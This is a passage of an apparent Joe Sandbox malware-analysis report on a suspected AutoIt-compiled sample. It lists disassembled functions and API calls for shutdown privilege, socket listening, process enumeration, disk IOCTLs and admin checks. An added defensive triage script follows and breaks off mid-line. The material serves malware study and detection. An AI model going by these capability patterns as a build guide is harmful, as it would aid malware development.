                                        • Instruction Fuzzy Hash: E3519A74604304AFD714EF20CC95F6A7BE0FB89310F00462DF9999B2E2CB70A949EB52
                                        APIs
                                          • Part of subcall function 00ED8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                                          • Part of subcall function 00ED8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                                          • Part of subcall function 00ED8CC3: GetLastError.KERNEL32 ref: 00ED8D47
                                        • ExitWindowsEx.USER32(?,00000000), ref: 00EE549B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-194228
                                        • Opcode ID: 299ec666146cc0e2e962d780dc00511f8629678adc3513d3a77ccc0ceb307ddd
                                        • Instruction ID: d82d90393b85d6e96d08e0aab0602027ccb748e40f52524d618451aae6817b0e
                                        • Opcode Fuzzy Hash: 299ec666146cc0e2e962d780dc00511f8629678adc3513d3a77ccc0ceb307ddd
                                        • Instruction Fuzzy Hash: 1F014733654A5D6AF7385276DC4ABBA7258EB0175AF242022FC27F20C3EA500C808291
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __itow__swprintf
                                        • String ID: Oa
                                        • API String ID: 674341424-3945284152
                                        • Opcode ID: 4217e7f167d55b946cdb3307107dcecd22857d1f1624ec7bd4ed0f1ace1860ef
                                        • Instruction ID: b86bb3de36ce5fe042220aefe44d7892c1b86414217fa233baf41e40105fdcf1
                                        • Opcode Fuzzy Hash: 4217e7f167d55b946cdb3307107dcecd22857d1f1624ec7bd4ed0f1ace1860ef
                                        • Instruction Fuzzy Hash: 59229E715083019FCB24DF24C881BAFB7E5AF88704F14591DF89AA7292DB71EE05CB92
                                        APIs
                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00EF65EF
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF65FE
                                        • bind.WS2_32(00000000,?,00000010), ref: 00EF661A
                                        • listen.WS2_32(00000000,00000005), ref: 00EF6629
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF6643
                                        • closesocket.WS2_32(00000000), ref: 00EF6657
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                        • String ID:
                                        • API String ID: 1279440585-0
                                        • Opcode ID: b52a43cfb1d44a7af2222d4f942ee4bcf9a1bcf69368d076bf8751cd241d6b05
                                        • Instruction ID: 4ff7aba5d7bd49bb2504ef7cc8e1818ada7f3d0c34d9e83e893f35d65b9bddd0
                                        • Opcode Fuzzy Hash: b52a43cfb1d44a7af2222d4f942ee4bcf9a1bcf69368d076bf8751cd241d6b05
                                        • Instruction Fuzzy Hash: 842159316002089FCB10AF64CC85B7AB7E9EF48724F159169EA5AF72D2CB70AD059B51
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00E819FA
                                        • GetSysColor.USER32(0000000F), ref: 00E81A4E
                                        • SetBkColor.GDI32(?,00000000), ref: 00E81A61
                                          • Part of subcall function 00E81290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00E812D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ColorDialogNtdllProc_$LongWindow
                                        • String ID:
                                        • API String ID: 591255283-0
                                        • Opcode ID: 721152126d1275f327bf183bc52f1511df6def03db8cf70b5e7664fd36c2b523
                                        • Instruction ID: 4ff70c277bef3453c546c28690e2d9c2e1a451972d94988262c28d8bdefea839
                                        • Opcode Fuzzy Hash: 721152126d1275f327bf183bc52f1511df6def03db8cf70b5e7664fd36c2b523
                                        • Instruction Fuzzy Hash: 87A11771105588FAD62CBB28DC95DFB399CDB82349B14229EF40EF61D2DA548D03A3B2
                                        APIs
                                          • Part of subcall function 00EF80A0: inet_addr.WS2_32(00000000), ref: 00EF80CB
                                        • socket.WS2_32(00000002,00000002,00000011), ref: 00EF6AB1
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF6ADA
                                        • bind.WS2_32(00000000,?,00000010), ref: 00EF6B13
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF6B20
                                        • closesocket.WS2_32(00000000), ref: 00EF6B34
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 99427753-0
                                        • Opcode ID: 43b9c7e7210a16d20d9bcfc92781589112f2ae99daeb4d33b1dc93186cb35680
                                        • Instruction ID: 89a31da116a35dceefd4b3d06fbfda795def3d883fc95bf70c42d1debfbf334d
                                        • Opcode Fuzzy Hash: 43b9c7e7210a16d20d9bcfc92781589112f2ae99daeb4d33b1dc93186cb35680
                                        • Instruction Fuzzy Hash: 3941AF75A40214AFEB10BF64DC86F7E77E8AB48720F449058FA5EBB2D3DA709D018791
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: 91a1a5ed6caa6d0d8613d5354a9dd7c4b7a414c2fa853b8796c7ce270c0e9362
                                        • Instruction ID: 42768388e79cf5278e597434aac8dab01ce9a80fd11b02404b63ee2953373951
                                        • Opcode Fuzzy Hash: 91a1a5ed6caa6d0d8613d5354a9dd7c4b7a414c2fa853b8796c7ce270c0e9362
                                        • Instruction Fuzzy Hash: 0811C432B009146FEB316F26DC44B2F779CFF84B21B444429F80AD7281CBB19901EEA5
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00EFF151
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00EFF15F
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • Process32NextW.KERNEL32(00000000,?), ref: 00EFF21F
                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00EFF22E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                        • String ID:
                                        • API String ID: 2576544623-0
                                        • Opcode ID: 6c528f025a1c837d20009c69c54f13c29408283c07653558bfa1c9304cc8afe5
                                        • Instruction ID: 8c2119b2cf4886b11e05c0f2c26af28078c77b2b859996fdd8185c6d083b89db
                                        • Opcode Fuzzy Hash: 6c528f025a1c837d20009c69c54f13c29408283c07653558bfa1c9304cc8afe5
                                        • Instruction Fuzzy Hash: C0516E715043059FD314EF20DC85A6BB7E8FF98710F54582DF59AA72A2EB70E908CB92
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • GetCursorPos.USER32(?), ref: 00F0C7C2
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00EBBBFB,?,?,?,?,?), ref: 00F0C7D7
                                        • GetCursorPos.USER32(?), ref: 00F0C824
                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00EBBBFB,?,?,?), ref: 00F0C85E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                        • String ID:
                                        • API String ID: 1423138444-0
                                        • Opcode ID: afb79e542cba62024e308f2a5512a6459d59a97d53dda233f19f9295278c050d
                                        • Instruction ID: 6371b93bf638c5091be895eb6eacc32caaeddaebca20c331e3f4f5c0a2feb8de
                                        • Opcode Fuzzy Hash: afb79e542cba62024e308f2a5512a6459d59a97d53dda233f19f9295278c050d
                                        • Instruction Fuzzy Hash: 0B318135500018AFCB25CF58C898EEA7BF6EB0A320F044169F905872A1D7315950FBA4
                                        APIs
                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE40D1
                                        • _memset.LIBCMT ref: 00EE40F2
                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EE4144
                                        • CloseHandle.KERNEL32(00000000), ref: 00EE414D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                        • String ID:
                                        • API String ID: 1157408455-0
                                        • Opcode ID: 5faf38cc6f49fbda057e66270cff5f66068480b7e7f4e4d6cd7732ba7ec5a93a
                                        • Instruction ID: 0e61f776d0e3d78d9406a077d06948681a666108a6a5307a144b9754009d1b26
                                        • Opcode Fuzzy Hash: 5faf38cc6f49fbda057e66270cff5f66068480b7e7f4e4d6cd7732ba7ec5a93a
                                        • Instruction Fuzzy Hash: C011AB7590122C7AD7309BA5AC4DFABBB7CEF45764F1041A6F908E7180D6744E848BA4
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00E812D8
                                        • GetClientRect.USER32(?,?), ref: 00EBB84B
                                        • GetCursorPos.USER32(?), ref: 00EBB855
                                        • ScreenToClient.USER32(?,?), ref: 00EBB860
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                        • String ID:
                                        • API String ID: 1010295502-0
                                        • Opcode ID: 25ad7c0553aec00b79194418630ed55bb130a828cd4abec8dca053cdd1fc0ddb
                                        • Instruction ID: f9caeaedd3ad5a3fe00a36f58569050d5813179691cb806e8b0e0df135a1f669
                                        • Opcode Fuzzy Hash: 25ad7c0553aec00b79194418630ed55bb130a828cd4abec8dca053cdd1fc0ddb
                                        • Instruction Fuzzy Hash: A4113635A0011DAFCB10EFA8D8859FE77BCFB05310F000496FA09E7261D730BA56ABA5
                                        APIs
                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EF1AFE,00000000), ref: 00EF26D5
                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EF270C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Internet$AvailableDataFileQueryRead
                                        • String ID:
                                        • API String ID: 599397726-0
                                        • Opcode ID: c4b4e68197b342fd434e53c6206e8a27a747c99f6fd8e3c4496936f42cab4fc6
                                        • Instruction ID: cfaf21938d6db9ff6aad796c2f18cfa734f10429f794df11fad81142b9591300
                                        • Opcode Fuzzy Hash: c4b4e68197b342fd434e53c6206e8a27a747c99f6fd8e3c4496936f42cab4fc6
                                        • Instruction Fuzzy Hash: 6941C27190020DBFEB20DA54CC85EBBB7ECEB44758F10506EF701B6180EB71AE419655
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00EEB5AE
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EEB608
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EEB655
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        • Opcode ID: 0b45cbb40a3d44cbea018c628e09050041e4637082f59a30ecf20f7fdeda5721
                                        • Instruction ID: 7c9adc8740f412e9f912c380613956f9f3d3e422b88a89df99e39383a81b3542
                                        • Opcode Fuzzy Hash: 0b45cbb40a3d44cbea018c628e09050041e4637082f59a30ecf20f7fdeda5721
                                        • Instruction Fuzzy Hash: 0B213275A0051CEFCB00EF95D884AADBBF8FF48314F1480AAE949AB351DB319955CB51
                                        APIs
                                          • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                                          • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                                        • GetLastError.KERNEL32 ref: 00ED8D47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                        • String ID:
                                        • API String ID: 1922334811-0
                                        • Opcode ID: 82492873634415c1296a9dab8b3c639c2c60a1b6dd92fcd17870985aa219c76b
                                        • Instruction ID: ddf8391c26c1bdecff151c3bbd4de05362cb4def19c3829291a12fee2198b7c5
                                        • Opcode Fuzzy Hash: 82492873634415c1296a9dab8b3c639c2c60a1b6dd92fcd17870985aa219c76b
                                        • Instruction Fuzzy Hash: EA11CEB1514208AFE728EF64DD85D6BB7FDFB08710B20852EF456A7681EB30BC418A20
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE4C2C
                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EE4C43
                                        • FreeSid.ADVAPI32(?), ref: 00EE4C53
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                         • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: 416c073cb0fa2dd3782fb245102799e3fc5b6fbaf581fdd1ad38304888c8082b
                                        • Instruction ID: a5d3660b7dd33a8196ea3e48b2df11d83859913967dc8125c8a554d6e539f1a1
                                        • Opcode Fuzzy Hash: 416c073cb0fa2dd3782fb245102799e3fc5b6fbaf581fdd1ad38304888c8082b
                                        • Instruction Fuzzy Hash: B7F04975A1130CBFEF04DFF0DC89AAEBBBCFF08301F1044A9A901E2581E6746A089B50
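Added triage example, not part of the Joe Sandbox report or of the sample's own code. The entries above list a socket/bind routine whose socket arguments 2, 2, 0x11 are AF_INET, SOCK_DGRAM and IPPROTO_UDP, a Toolhelp32 process walk, a DeviceIoControl call with control code 0004D02C, a LookupPrivilegeValueW/AdjustTokenPrivileges pair, and an AllocateAndInitializeSid/CheckTokenMembership pair whose sub-authorities 0x20 and 0x220 are SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS, the usual BUILTIN\Administrators test. The Python script below parses entries in exactly this text layout (its SAMPLE is constructed from the API lines of four entries above), splits the DeviceIoControl code into its CTL_CODE fields (0x4D02C is device type 4, function 0x40B, METHOD_BUFFERED, read/write access, which ntddscsi.h names IOCTL_ATA_PASS_THROUGH) and maps the API combinations to behaviour labels. The rule table, the label strings and the function names (parse_entries, decode_ioctl, classify, triage) are this example's own. One caveat: the report flags the binary as a likely compiled AutoIt script, so these functions are most plausibly part of the AutoIt runtime embedded in the image; their presence in the disassembly does not by itself show the script invokes them, and static hits like these should be correlated with the dynamic API-call and IDS findings of the report rather than scored on their own.

```python
"""Added example: triage Joe Sandbox "APIs" entries; rules and labels are this example's own."""
import re
from typing import Dict, List, Optional

# Constructed input: API lines copied from four of the entries above, in the
# report's layout ("APIs" header, bullet lines, "Memory Dump Source" footer).
SAMPLE = """\
APIs
  • Part of subcall function 00EF80A0: inet_addr.WS2_32(00000000), ref: 00EF80CB
• socket.WS2_32(00000002,00000002,00000011), ref: 00EF6AB1
• bind.WS2_32(00000000,?,00000010), ref: 00EF6B13
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00EFF151
• Process32FirstW.KERNEL32(00000000,?), ref: 00EFF15F
• Process32NextW.KERNEL32(00000000,?), ref: 00EFF21F
Memory Dump Source
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00EE40D1
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00EE4144
Memory Dump Source
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE4C2C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EE4C43
Memory Dump Source
"""

# One bullet line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)", then "ref: <address>".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z0-9_@:]+)\.(?P<module>[A-Za-z0-9_]+)"
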